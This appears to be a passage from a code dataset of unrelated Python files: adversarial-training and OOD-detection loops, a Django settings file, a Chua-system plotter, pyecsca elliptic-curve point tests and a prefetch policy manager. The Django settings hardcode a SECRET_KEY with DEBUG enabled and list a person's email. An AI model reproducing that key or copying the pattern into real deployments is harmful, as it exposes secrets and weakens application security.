Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Add additional metrics!!!\n \n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n correct += top1_correct\n \n summary = {\n 'avg_loss': avg_loss / in_data_size,\n 'classifier_acc': correct / in_data_size,\n 'lr': optim.get_lr_at_epoch(op_cfg, cur_epoch),\n 'epoch': cur_epoch,\n }\n \n return summary\n \n \ndef valid_epoch_wo_outlier(model, in_loader, loss_func, cur_epoch):\n global global_cfg\n model.eval()\n avg_loss = 0\n correct = 0\n in_data_size = len(in_loader.dataset)\n for cur_iter, in_set in enumerate(in_loader): \n # Data to GPU\n data = in_set[0]\n targets = in_set[1]\n data, targets = data.cuda(), targets.cuda()\n \n # Foward propagation and Calculate loss\n logits = model(data)\n\n global_cfg['loss']['model'] = model\n global_cfg['loss']['data'] = data\n loss_dict = loss_func(logits, targets, global_cfg['loss'])\n loss = loss_dict['loss']\n \n # Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Add additional metrics!!\n \n \n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n correct += top1_correct\n \n summary = {\n 'avg_loss': avg_loss / in_data_size,\n 'classifier_acc': correct / in_data_size,\n 'epoch': cur_epoch,\n }\n \n return summary\n \n\n\ndef train_epoch_w_outlier(model, optimizer, in_loader, out_loader, loss_func, cur_epoch, op_cfg, writer, attack_in, attack_out):\n global global_cfg\n model.train()\n avg_loss = 0\n avg_in_loss = 0\n avg_out_loss = 0\n correct = 0\n total = 0\n in_data_size = len(in_loader.dataset)\n out_loader.dataset.offset = np.random.randint(len(out_loader.dataset))\n for cur_iter, (in_set, out_set) in enumerate(zip(in_loader, out_loader)):\n #TODO: Dimension of in_set and out_set should be checked!\n \n # Perturb data and move to GPU\n targets = in_set[1].cuda()\n adv_in_input = attack_in.perturb(in_set[0].cuda(), targets)\n adv_out_input = attack_out.perturb(out_set[0].cuda())\n adv_input = torch.cat((adv_in_input, adv_out_input), 0).cuda()\n #print(\"inlier batch: {} | outlier batch: {}\".format(in_set[0].size(0), out_set[0].size(0)))\n if cur_iter == 0:\n \n writer.add_image('In/Original', in_set[0][0], cur_epoch)\n writer.add_image('In/Perturb', adv_in_input[0], cur_epoch)\n #writer.add_image('In/Diff', (adv_in_input[0] - in_set[0][0]).cuda(), cur_epoch)\n writer.add_image('Out/Original', out_set[0][0], cur_epoch)\n writer.add_image('Out/Perturb', adv_out_input[0], cur_epoch)\n #writer.add_image('Out/Diff', (adv_out_input[0] - out_set[0][0]).cuda(), cur_epoch)\n \n # Adjust Learning rate\n lr = optim.get_lr_at_epoch(op_cfg, cur_epoch + float(cur_iter) / in_data_size)\n optim.set_lr(optimizer, lr)\n \n # Forward\n logits = model(adv_input)\n \n # Calcuate loss\n global_cfg['loss']['model'] = model\n loss_dict = loss_func(logits, targets, global_cfg['loss']) \n loss = loss_dict['loss']\n in_loss = loss_dict['in_loss'].data\n out_loss = loss_dict['out_loss'].data\n \n # Back propagation \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n ## METRICS ##\n # Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Calculate OOD metrics (auroc, aupr, fpr)\n #(auroc, aupr, fpr) = metrics.get_ood_measures(confidences, targets)\n \n # Add additional metrics!!!\n \n \n ## UDATE STATS ##\n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n avg_in_loss += in_loss\n avg_out_loss += out_loss\n correct += top1_correct\n total += targets.size(0)\n \n summary = {\n 'avg_loss': avg_loss / total,\n 'avg_in_loss': avg_in_loss / total,\n 'avg_out_loss': avg_out_loss / total,\n 'classifier_acc': correct / total,\n 'lr': optim.get_lr_at_epoch(op_cfg, cur_epoch),\n 'epoch': cur_epoch,\n }\n \n return summary\n \n \ndef valid_epoch_w_outlier(model, in_loader, out_loader, loss_func, detector_func, cur_epoch):\n global global_cfg \n model.eval()\n avg_loss = 0\n correct = 0\n total = 0\n max_iter = 0\n avg_auroc = 0\n avg_aupr = 0\n avg_fpr = 0\n in_data_size = len(in_loader.dataset)\n for cur_iter, (in_set, out_set) in enumerate(zip(in_loader, out_loader)): \n # Data to GPU\n data = torch.cat((in_set[0], out_set[0]), 0)\n targets = in_set[1]\n data, targets = data.cuda(), targets.cuda()\n \n # Foward propagation and Calculate loss and confidence\n logits = model(data)\n global_cfg['loss']['model'] = model\n global_cfg['loss']['data'] = data\n global_cfg['detector']['model'] = model\n global_cfg['detector']['data'] = data\n loss_dict = loss_func(logits, targets, global_cfg['loss'])\n loss = loss_dict['loss']\n confidences_dict = detector_func(logits, targets, global_cfg['detector'])\n confidences = confidences_dict['confidences']\n \n ## METRICS ##\n # Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Calculate OOD metrics (auroc, aupr, fpr)\n (auroc, aupr, fpr) = metrics.get_ood_measures(confidences, targets)\n \n # Add additional metrics!!!\n \n ## Update stats ##\n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n correct += top1_correct\n total += targets.size(0)\n max_iter += 1\n avg_auroc += auroc\n avg_aupr += aupr\n avg_fpr += fpr\n \n \n summary = {\n 'avg_loss': avg_loss / total,\n 'classifier_acc': correct / total,\n 'AUROC': avg_auroc / max_iter,\n 'AUPR' : avg_aupr / max_iter,\n 'FPR95': avg_fpr / max_iter,\n 'epoch': cur_epoch,\n }\n \n return summary\n \ndef main():\n global global_cfg\n # Reproducibility\n np.random.seed(cfg['seed'])\n torch.manual_seed(cfg['seed'])\n \n # Model & Optimizer\n model = getModel(cfg['model'])\n optimizer = optim.getOptimizer(model, cfg['optim'])\n start_epoch = 1\n \n # Load model and optimizer\n if cfg['load_ckpt'] != '':\n checkpoint = torch.load(cfg['load_ckpt'], map_location=\"cpu\")\n model.load_state_dict(checkpoint['model_state'])\n print(\"load model on '{}' is complete.\".format(cfg['load_ckpt']))\n if not cfg['finetuning']:\n optimizer.load_state_dict(checkpoint['optimizer_state'])\n if 'epoch' in checkpoint.keys() and not cfg['finetuning']:\n start_epoch = checkpoint['epoch']\n print(\"Restore epoch {}\".format(start_epoch))\n else:\n start_epoch = 1\n cudnn.benchmark = True\n \n # Data Loader\n in_train_loader = getDataLoader(ds_cfg=cfg['in_dataset'],\n dl_cfg=cfg['dataloader'],\n split=\"train\")\n in_valid_loader = getDataLoader(ds_cfg=cfg['in_dataset'],\n dl_cfg=cfg['dataloader'],\n split=\"valid\")\n \n attack_in = LinfPGDAttack(model=model, eps=cfg['PGD']['epsilon'], nb_iter=cfg['PGD']['iters'],\n eps_iter=cfg['PGD']['iter_size'], rand_init=True, loss_func='CE')\n \n if cfg['out_dataset'] is not None:\n out_train_loader = getDataLoader(ds_cfg=cfg['out_dataset'],\n dl_cfg=cfg['dataloader'],\n split=\"train\")\n out_valid_loader = getDataLoader(ds_cfg=cfg['out_dataset'],\n dl_cfg=cfg['dataloader'],\n split=\"valid\")\n attack_out = LinfPGDAttack(model = model, eps=cfg['PGD']['epsilon'], nb_iter=cfg['PGD']['iters'],\n eps_iter=cfg['PGD']['iter_size'], rand_init=True, loss_func='OE')\n \n else:\n out_train_loader = None\n out_valid_loader = None\n attact_out = None\n \n # Result directory and make tensorboard event file\n exp_dir = os.path.join(cfg['exp_root'], cfg['exp_dir'])\n if os.path.exists(exp_dir) is False:\n os.makedirs(exp_dir)\n shutil.copy('./config.py', os.path.join(exp_dir, \"config.py\"))\n writer_train = SummaryWriter(logdir=os.path.join(exp_dir, 'log', 'train'))\n writer_valid = SummaryWriter(logdir=os.path.join(exp_dir, 'log', 'valid'))\n \n # Stats Meters\n #train_meter = TrainMeter()\n #valid_meter = ValidMeter()\n \n # Loss function\n loss_func = losses.getLoss(cfg['loss'])\n global_cfg['loss'] = cfg['loss']\n \n # Outlier detector\n detector_func = detectors.getDetector(cfg['detector'])\n global_cfg['detector'] = cfg['detector']\n \n print(\"=======================IMPORTANT CONFIG=======================\")\n print(\" Model : {}\\n \\\nLoss : {}\\n \\\nDetector : {}\\n \\\nOptimizer: {}\\n\".format(cfg['model']['network_kind'], cfg['loss']['loss'], cfg['detector']['detector'], cfg['optim']['optimizer']))\n print(\"============Start training. Result will be saved in {}\".format(exp_dir))\n \n for cur_epoch in range(start_epoch, cfg['max_epoch'] + 1):\n if out_train_loader is not None:\n train_summary = train_epoch_w_outlier(model, optimizer,\n in_train_loader, out_train_loader,\n loss_func, cur_epoch,\n cfg['optim'], writer_train, attack_in, attack_out)\n else:\n train_summary = train_epoch_wo_outlier(model, optimizer,\n in_train_loader, loss_func,\n cur_epoch, cfg['optim'], writer_train, attack_in)\n summary_write(summary=train_summary, writer=writer_train)\n print(\"Training result=========Epoch [{}]/[{}]=========\\nlr: {} | loss: {} | attacked_acc: {}\\nin_loss: {} | out_loss: {}\".format(cur_epoch, cfg['max_epoch'], train_summary['lr'], train_summary['avg_loss'], train_summary['classifier_acc'], train_summary['avg_in_loss'], train_summary['avg_out_loss']))\n \n \n if cur_epoch % cfg['valid_epoch'] == 0:\n if out_valid_loader is not None:\n valid_summary = valid_epoch_w_outlier(model,\n in_valid_loader, out_valid_loader,\n loss_func, detector_func, cur_epoch)\n else:\n valid_summary = valid_epoch_wo_outlier(model,\n in_valid_loader,\n loss_func, cur_epoch)\n summary_write(summary=valid_summary, writer=writer_valid)\n print(\"Validate result=========Epoch [{}]/[{}]=========\\nloss: {} | acc: {}\".format(cur_epoch, cfg['max_epoch'], valid_summary['avg_loss'], valid_summary['classifier_acc']))\n \n if cur_epoch % cfg['ckpt_epoch'] == 0:\n ckpt_dir = os.path.join(cfg['exp_root'], cfg['exp_dir'], \"ckpt\")\n if os.path.exists(ckpt_dir) is False:\n os.makedirs(ckpt_dir)\n model_state = model.module.state_dict() if cfg['ngpu'] > 1 else model.state_dict()\n checkpoint = {\n \"epoch\": cur_epoch,\n \"model_state\": model_state,\n \"optimizer_state\": optimizer.state_dict(),\n }\n ckpt_name = \"checkpoint_epoch_{}\".format(cur_epoch)\n ckpt_path = os.path.join(ckpt_dir, ckpt_name + \".pyth\")\n torch.save(checkpoint, ckpt_path)\n \n\nif __name__==\"__main__\":\n print(\"Setup Training...\")\n main()","sub_path":"tools/train_aloe.py","file_name":"train_aloe.py","file_ext":"py","file_size_in_byte":14697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"180923240","text":"# Django settings for Smash project.\nfrom constants import *\nimport os\ndef absPath(rel):\n return os.path.join(ROOT_PATH, '..', rel)\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nADMIN_MEDIA_PREFIX = '/static/admin/'\nROOT_PATH = os.path.dirname(__file__)\nADMINS = (\n ('Jack Reilly', 'jackdreilly@gmail.com'),\n)\nMANAGERS = ADMINS\nTIME_ZONE = 'America/Los_Angeles'\n\n\n\nMEDIA_ROOT = absPath('media')\nMEDIA_URL = '/media'\nSTATIC_URL = '/static'\nSTATIC_ROOT = absPath('static')\n\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n)\n\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'jke$n#$1c72ex!ykevokt5!i^gn(24n(l647t9=4dnt(vge5*q'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.gzip.GZipMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = '%s.urls' % PROJECT_NAME\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'frontend',\n 'south',\n 'dajaxice',\n 'dajax',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","sub_path":"src/Clothesliner/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63239690","text":"from ipywidgets import interact, interactive, HBox, Layout,VBox\n\nimport numpy as np\nfrom scipy import integrate\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.colors import cnames\nfrom matplotlib import animation\n\ndef solve_chua(numberOfTrajectories=10, min_x0=0.0, max_x0=0.5, anglex=0.0, angley=30.0, max_time=14.0, alpha=15.6, beta=1, gamma=28,m0=-1.143, m1=-0.714):\n\n fig = plt.figure(figsize=(8, 6), dpi=80)\n ax = fig.add_axes([0, 0, 1, 1], projection='3d')\n ax.axis('off')\n\n # prepare the axes limits\n ax.set_xlim((-40, 40))\n ax.set_ylim((-60, 60))\n ax.set_zlim((5, 55))\n \n def g(x,m0,m1):\n rv=0\n if x<= -1:\n rv=m1*x+m1-m0;\n elif x<=1:\n rv=m0*x;\n else:\n rv=m1*x+m0-m1\n return rv\n \n def chua_deriv(x_y_z, t0, alpha=alpha, beta=beta, gamma=gamma,m0=m0,m1=m1):\n \"\"\"Compute the time-derivative of a Chua system.\"\"\"\n x, y, z = x_y_z\n return [alpha * (y - x -g(x,m0,m1)), beta*(x - y + z), -gamma * y]\n\n # Choose random starting points, uniformly distributed from min_x0 to max_x0\n np.random.seed(1)\n span=max_x0-min_x0\n x0 = min_x0 + span * np.random.random((numberOfTrajectories, 3))\n\n # Solve for the trajectories\n t = np.linspace(0, max_time, int(250*max_time))\n x_t = np.asarray([integrate.odeint(chua_deriv, x0i, t)\n for x0i in x0])\n \n # choose a different color for each trajectory\n colors = plt.cm.viridis(np.linspace(0, 1, numberOfTrajectories))\n\n mins={\"x\":[],\"y\":[],\"z\":[]}\n maxs={\"x\":[],\"y\":[],\"z\":[]}\n for i in range(len(x_t)):\n x, y, z = x_t[i,:,:].T\n mins[\"x\"]+=[min(x)]\n maxs[\"x\"]+=[max(x)]\n mins[\"y\"]+=[min(y)]\n maxs[\"y\"]+=[max(y)]\n mins[\"z\"]+=[min(z)]\n maxs[\"z\"]+=[max(z)]\n # prepare the axes limits\n ax.set_xlim((min(mins[\"x\"]),max(maxs[\"x\"])))\n ax.set_ylim((min(mins[\"y\"]),max(maxs[\"y\"])))\n ax.set_zlim((min(mins[\"z\"]),max(maxs[\"z\"])))\n\n for i in range(numberOfTrajectories):\n x, y, z = x_t[i,:,:].T\n lines = ax.plot(x, y, z, '-', c=colors[i])\n plt.setp(lines, linewidth=1)\n\n ax.view_init(angley, anglex)\n plt.show()\n\n return t, x_t","sub_path":"chuaSystem.py","file_name":"chuaSystem.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476069818","text":"from unittest import TestCase\n\nfrom pyecsca.ec.coordinates import AffineCoordinateModel\nfrom pyecsca.ec.params import get_params\nfrom pyecsca.ec.mod import Mod\nfrom pyecsca.ec.model import ShortWeierstrassModel, MontgomeryModel\nfrom pyecsca.ec.point import Point, InfinityPoint\n\n\nclass PointTests(TestCase):\n def setUp(self):\n self.secp128r1 = get_params(\"secg\", \"secp128r1\", \"projective\")\n self.base = self.secp128r1.generator\n self.coords = self.secp128r1.curve.coordinate_model\n self.affine = AffineCoordinateModel(ShortWeierstrassModel())\n\n def test_construction(self):\n with self.assertRaises(ValueError):\n Point(self.coords)\n\n def test_to_affine(self):\n pt = Point(\n self.coords,\n X=Mod(0x161FF7528B899B2D0C28607CA52C5B86, self.secp128r1.curve.prime),\n Y=Mod(0xCF5AC8395BAFEB13C02DA292DDED7A83, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n affine = pt.to_affine()\n\n self.assertIsInstance(affine.coordinate_model, AffineCoordinateModel)\n self.assertSetEqual(set(affine.coords.keys()), set(self.affine.variables))\n self.assertEqual(affine.coords[\"x\"], pt.coords[\"X\"])\n self.assertEqual(affine.coords[\"y\"], pt.coords[\"Y\"])\n self.assertEqual(affine.to_affine(), affine)\n\n affine = InfinityPoint(self.coords).to_affine()\n self.assertIsInstance(affine, InfinityPoint)\n\n def test_to_model(self):\n affine = Point(\n self.affine,\n x=Mod(0xABCD, self.secp128r1.curve.prime),\n y=Mod(0xEF, self.secp128r1.curve.prime),\n )\n projective_model = self.coords\n other = affine.to_model(projective_model, self.secp128r1.curve)\n\n self.assertEqual(other.coordinate_model, projective_model)\n self.assertSetEqual(set(other.coords.keys()), set(projective_model.variables))\n self.assertEqual(other.coords[\"X\"], affine.coords[\"x\"])\n self.assertEqual(other.coords[\"Y\"], affine.coords[\"y\"])\n self.assertEqual(other.coords[\"Z\"], Mod(1, self.secp128r1.curve.prime))\n\n infty = InfinityPoint(AffineCoordinateModel(self.secp128r1.curve.model))\n other_infty = infty.to_model(self.coords, self.secp128r1.curve)\n self.assertIsInstance(other_infty, InfinityPoint)\n\n with self.assertRaises(ValueError):\n self.base.to_model(self.coords, self.secp128r1.curve)\n\n def test_to_from_affine(self):\n pt = Point(\n self.coords,\n X=Mod(0x161FF7528B899B2D0C28607CA52C5B86, self.secp128r1.curve.prime),\n Y=Mod(0xCF5AC8395BAFEB13C02DA292DDED7A83, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n other = pt.to_affine().to_model(self.coords, self.secp128r1.curve)\n self.assertEqual(pt, other)\n\n def test_equals(self):\n pt = Point(\n self.coords,\n X=Mod(0x4, self.secp128r1.curve.prime),\n Y=Mod(0x6, self.secp128r1.curve.prime),\n Z=Mod(2, self.secp128r1.curve.prime),\n )\n other = Point(\n self.coords,\n X=Mod(0x2, self.secp128r1.curve.prime),\n Y=Mod(0x3, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n third = Point(\n self.coords,\n X=Mod(0x5, self.secp128r1.curve.prime),\n Y=Mod(0x3, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n self.assertTrue(pt.equals(other))\n self.assertNotEqual(pt, other)\n self.assertFalse(pt.equals(2))\n self.assertNotEqual(pt, 2)\n self.assertFalse(pt.equals(third))\n self.assertNotEqual(pt, third)\n self.assertTrue(pt.equals_scaled(other))\n self.assertTrue(pt.equals_affine(other))\n self.assertFalse(pt.equals_scaled(third))\n\n infty_one = InfinityPoint(self.coords)\n infty_other = InfinityPoint(self.coords)\n self.assertTrue(infty_one.equals(infty_other))\n self.assertTrue(infty_one.equals_affine(infty_other))\n self.assertTrue(infty_one.equals_scaled(infty_other))\n self.assertEqual(infty_one, infty_other)\n self.assertFalse(pt.equals(infty_one))\n self.assertFalse(pt.equals_affine(infty_one))\n self.assertFalse(pt.equals_scaled(infty_one))\n\n mont = MontgomeryModel()\n different = Point(\n mont.coordinates[\"xz\"],\n X=Mod(\n 0x64DACCD2656420216545E5F65221EB,\n 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,\n ),\n Z=Mod(1, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA),\n )\n self.assertFalse(pt.equals(different))\n self.assertNotEqual(pt, different)\n\n def test_bytes(self):\n pt = Point(\n self.coords,\n X=Mod(0x4, self.secp128r1.curve.prime),\n Y=Mod(0x6, self.secp128r1.curve.prime),\n Z=Mod(2, self.secp128r1.curve.prime),\n )\n self.assertEqual(\n bytes(pt),\n b\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\",\n )\n self.assertEqual(bytes(InfinityPoint(self.coords)), b\"\\x00\")\n\n def test_iter(self):\n pt = Point(\n self.coords,\n X=Mod(0x4, self.secp128r1.curve.prime),\n Y=Mod(0x6, self.secp128r1.curve.prime),\n Z=Mod(2, self.secp128r1.curve.prime),\n )\n t = tuple(pt)\n self.assertEqual(len(t), 3)\n self.assertEqual(len(pt), 3)\n","sub_path":"test/ec/test_point.py","file_name":"test_point.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452298395","text":"#!/usr/bin/python\n\nimport os\nimport struct\nimport locale\nimport fcntl\nimport time\n\nimport subprocess\nimport sys\n\nfrom optparse import OptionParser\nfrom io import BlockingIOError\n\ndef enum(**enums):\n return type('Enum', (), enums)\n\nENUMS = enum(PRT_COMM_SEND=1, PRT_COMM_RECV=2, \\\n HWPF_ON=0, LLC_HWPF_OFF=1, HWPF_OFF=2, \\\n SWPF_8MBLLC=1, SWPF_6MBLLC=2, SWPF_4MBLLC=3, \\\n SWPF_2MBLLC=4, SWPF_1MBLLC=5, SWPF_0MBLLC=6, SWPF_JIT_ACTIVE=7,\\\n NO_REVERT_TO_PREV=0, REVERT_TO_PREV=1, REVERT_TO_ORIG=2)\n\n#4:[\"hwpf\", \"swpf\", \"l1hwpfswpf\", \"hwpfswpf\", \"nopref\"],\n#3:[\"hwpf\", \"l1hwpfswpf\", \"swpf\", \"hwpfswpf\"]\nEXP_PLAN = {4:[\"hwpf\", \"swpf\", \"l1hwpfswpf\", \"hwpfswpf\"], \\\n 3:[\"hwpf\", \"l1hwpfswpf\", \"swpf\"], \\\n 2:[\"hwpf\", \"hwpfswpf\", \"swpf\", \"l1hwpfswpf\"],\\\n 1:[\"hwpf\", \"hwpfswpf\", \"l1hwpfswpf\"]}\n\nPERF_BOOK = {\"hwpf\":1}\n\nAVG_PERF_BOOK = {}\nMON_WIN_BOOK = {}\n\nclass Conf:\n def __init__(self):\n \n parser = OptionParser(\"usage: %prog [OPTIONS...] INFILE\")\n \n parser.add_option(\"-b\", \"--buf-size\",\n type=\"int\", default=\"52\",\n dest=\"BUF_SIZE\",\n help=\"Size of structure communicated between runtime and policy manager\")\n parser.add_option(\"-n\", \"--num-apps\",\n type=\"int\", default=\"4\",\n dest=\"NUM_APPS\",\n help=\"Number of active cores. Total applications running\")\n parser.add_option(\"-s\", \"--sleep\",\n type=\"float\", default=\"0.05\",\n dest=\"SLEEP_TIME\",\n help=\"Sleep time in milli-seconds\")\n parser.add_option(\"-r\", \"--reexplore-in\",\n type=\"int\", default=\"5\",\n dest=\"REEXP_TIME\",\n help=\"Start re-exploration of best prefetch policy in XXX seconds\")\n parser.add_option(\"-p\", \"--rep-reexplore\",\n type=\"int\", default=\"10\",\n dest=\"REP_REEXP\",\n help=\"Repead re-exploration this many times\")\n parser.add_option(\"-w\", \"--num-mon-win\",\n type=\"int\", default=\"10\",\n dest=\"NUM_MON_WIN\",\n help=\"Number of performance windows to monitor for each policy\")\n parser.add_option(\"-e\", \"--mon-epoch\",\n type=\"float\", default=\"0.5\",\n dest=\"MON_EPOCH\",\n help=\"Duration of monitor epoch for each policy\")\n parser.add_option(\"-x\", \"--exit-after\",\n type=\"int\", default=\"65\",\n dest=\"EXIT_AFTER\",\n help=\"Exit after XXX seconds of applying the optimal policy\")\n parser.add_option(\"-t\", \"--retries\",\n type=\"int\", default=\"5\",\n dest=\"RETRIES\",\n help=\"Number of retries to important prefetch policies\")\n\n (opts, args) = parser.parse_args()\n \n \n self.STRUCT_FMTSTR=\"iiiiifffffiii\"\n self.ENABLED_SWPF = False\n self.curr_policy=\"hwpf\"\n self.baseline = \"hwpf\"\n self.max_perf_policy=\"hwpf\"\n self.max_thruput=1.0\n self.start_time = time.time()\n\n self.BUF_SIZE = opts.BUF_SIZE\n self.NUM_APPS = opts.NUM_APPS\n self.SLEEP_TIME = opts.SLEEP_TIME\n self.REEXP_TIME = opts.REEXP_TIME\n self.NUM_MON_WIN = opts.NUM_MON_WIN\n self.EXIT_AFTER= opts.EXIT_AFTER\n self.RETRIES = opts.RETRIES\n self.REP_REEXP = opts.REP_REEXP\n self.MON_EPOCH = opts.MON_EPOCH\n self.REEXP_FAIL_THR = 5\n self.reexp_fail_count = 0\n self.curr_ws = 1\n self.falsepos_count = 0\n self.falsepos_thr= 3\n self.win_policies = []\n self.backoff_reexp_time = self.REEXP_TIME\n self.MON_BASELINE_AFTER_ITER = 4\n self.mon_baseline_after = self.MON_BASELINE_AFTER_ITER\n\n self.rp = os.open(\"/tmp/PRT_POL_MAN_RECV\", os.O_RDONLY)\n fl = fcntl.fcntl(self.rp, fcntl.F_GETFL)\n fcntl.fcntl(self.rp, fcntl.F_SETFL, fl | os.O_NONBLOCK)\n\n self.rp_app = []\n self.wp = []\n \n for core_idx in range(self.NUM_APPS):\n \n self.rp_app.append(os.open(\"/tmp/PRT_SND_INFO_%d\"%(core_idx), os.O_RDONLY))\n self.wp.append(os.open(\"/tmp/PRT_RECV_INFO_%d\"%(core_idx), os.O_WRONLY ))\n \n fl = fcntl.fcntl(self.rp_app[core_idx], fcntl.F_GETFL)\n fcntl.fcntl(self.rp_app[core_idx], fcntl.F_SETFL, fl | os.O_NONBLOCK)\n \n fl = fcntl.fcntl(self.wp[core_idx], fcntl.F_GETFL)\n fcntl.fcntl(self.wp[core_idx], fcntl.F_SETFL, fl | os.O_NONBLOCK)\n\ndef nonblocking_readlines(fd, conf):\n\n os.lseek(fd, 0, os.SEEK_SET)\n\n buf = bytearray()\n remaining_bytes = conf.BUF_SIZE\n \n while remaining_bytes > 0:\n try:\n block = os.read(fd, conf.BUF_SIZE) #read BUF_SIZE-byte chunks at a time\n #deleteContent(fd)\n except BlockingIOError:\n None\n \n remaining_bytes -= len(block)\n \n #print >> sys.stderr, \"data is %d Bytes\"%(len(block))\n \n if not block:\n if buf:\n buf.clear()\n return None\n \n buf.extend(block)\n\n if remaining_bytes > 0:\n time.sleep(conf.SLEEP_TIME)\n \n return buf\n\ndef send_data(fd, snd_data):\n deleteContent(fd)\n os.write(fd, snd_data)\n\ndef deleteContent(fd):\n os.ftruncate(fd, 0)\n os.lseek(fd, 0, os.SEEK_SET)\n\ndef compute_weighted_speedup(bpc_list, conf):\n\n hwpf_bpc_list = AVG_PERF_BOOK[\"hwpf\"]\n ws = 0.0\n\n for idx in range(conf.NUM_APPS):\n ws += float(bpc_list[idx])/float(hwpf_bpc_list[idx])\n\n return float(ws)/float(conf.NUM_APPS)\n\ndef monitor_perf(policy, mon_time, conf):\n\n print >> sys.stderr, \"POLMAN -- monitoring performance for policy %s\"%(policy)\n\n i=0\n\n core_id = [0,1,2,3]\n bpc = [0,0,0,0]\n \n num_mon_wins = mon_time / conf.SLEEP_TIME\n\n while i < num_mon_wins: #conf.NUM_MON_WIN:\n\n data = nonblocking_readlines(conf.rp, conf)\n \n if not data:\n continue\n \n (comm_type, core0, core1, core2, core3, bpc0, bpc1, bpc2, bpc3, sys_bw, hwpf_status, swpf_status, revert) = struct.unpack(conf.STRUCT_FMTSTR, data)\n\n bpc[0] += bpc0\n bpc[1] += bpc1\n bpc[2] += bpc2\n bpc[3] += bpc3\n \n #print >> sys.stderr, \"%f -- %f %f %f %f\"%(time.time()-conf.start_time, bpc0, bpc1, bpc2, bpc3)\n \n i += 1\n time.sleep(conf.SLEEP_TIME)\n\n #revert immediately do default once performance has been recorded\n #if policy != \"hwpf\":\n # ready_this_policy(\"hwpf\", conf)\n\n #average recorded bpc\n for idx in range(conf.NUM_APPS):\n bpc[idx] = float(bpc[idx])/float(num_mon_wins)#conf.NUM_MON_WIN)\n #print >> sys.stderr, \"bpc[%d] -- %f\"%(idx,bpc[idx])\n\n if policy in AVG_PERF_BOOK:\n for idx in range(conf.NUM_APPS):\n #if policy == conf.baseline:\n if bpc[idx] > 0:\n AVG_PERF_BOOK[policy][idx] = float(AVG_PERF_BOOK[policy][idx]+bpc[idx])/float(2)\n #else:\n #AVG_PERF_BOOK[policy][idx] += bpc[idx]\n else:\n AVG_PERF_BOOK[policy] = bpc\n\ndef wait_for_JIT(conf, revert):\n\n print >> sys.stderr, \"POLMAN -- Waiting for %d JIT instances to complete\"%(len(conf.rp_app))\n \n for fd in conf.rp_app:\n while True:\n data = nonblocking_readlines(fd, conf)\n if not data:\n time.sleep(conf.SLEEP_TIME)\n continue\n (comm_type, core0, core1, core2, core3, bpc0, bpc1, bpc2, 